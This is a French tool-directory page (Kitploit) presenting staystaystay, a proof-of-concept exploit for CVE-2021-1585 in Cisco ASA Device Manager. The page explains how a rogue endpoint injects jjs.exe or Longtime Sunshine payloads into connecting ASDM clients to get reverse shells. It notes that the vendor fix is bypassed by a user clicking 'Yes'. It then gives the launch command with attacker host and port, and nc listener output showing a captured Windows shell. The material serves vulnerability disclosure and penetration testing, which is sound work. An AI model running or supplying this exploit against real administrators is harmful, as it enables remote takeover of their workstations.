Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
staystaystay — Preuve de concept pour CVE-2021-1585 : Cisco ASA Device Manager RCE | Kitploit
Outils/GitHubGitHub/jbaines-r7/staystaystay
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubjbaines-r7/staystaystay

staystaystay

Preuve de concept pour CVE-2021-1585 : Cisco ASA Device Manager RCE

Voir le dépôt
13413il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

staystaystay

staystaystay est un exploit de preuve de concept pour CVE-2021-1585, un problème de RCE (exécution de code à distance) de type homme du milieu ou point de terminaison malveillant affectant Cisco ASA Device Manager (ASDM). Ce problème a été découvert à l'origine par Malcolm Lashley et divulgué à l'été 2021. Cependant, au moment où je m'y intéressais, il n'était pas corrigé dans la dernière version (ASDM 7.17(1)), et je suis tombé dessus indépendamment.

Cisco a « corrigé » ce problème dans ASDM 7.18(1.152). Je dis « corrigé » parce que cet exploit fonctionne encore très bien. L'utilisateur devra simplement cliquer sur « Oui ». Voir une vidéo ci-dessous.

Les attaquants peuvent configurer deux types de payloads pour obtenir un reverse shell sur la victime :

  • à base de jjs.exe (un fichier est écrit sur le disque - et cela a récemment été détecté par Windows Defender)
  • à base de Longtime Sunshine

Si une victime connecte son ASDM à staystaystay, celui-ci injectera le payload configuré, ce qui permettra d'obtenir un reverse shell. Le reverse shell jjs peut être capturé avec un écouteur nc classique (ou même Metasploit, si vous le souhaitez). L'option Longtime Sunshine nécessite que l'attaquant utilise ce framework.

Par exemple, la commande suivante démarre staystaystay sur le port 8443 avec le payload :

jjs
root@kitploit:~
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443

Une fois que la victime se connecte au port 8443, un reverse shell sera généré vers 10.0.0.2:1270 :

root@kitploit:~
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster

C:\Program Files (x86)\Cisco Systems\ASDM>

La vidéo suivante contient un exemple d'exploitation avec Longtime Sunshine :

  • https://www.youtube.com/watch?v=07VO2JGTWR8

La vidéo suivante démontre l'attaque contre une version corrigée :

  • https://www.youtube.com/watch?v=ySgbHClk9HE

Une analyse AttackerKB est disponible ici :

  • https://attackerkb.com/topics/0vIso8fLhQ/cve-2021-1585/rapid7-analysis

Crédits

  • Taylor Swift - Version acoustique
Télécharger l’outil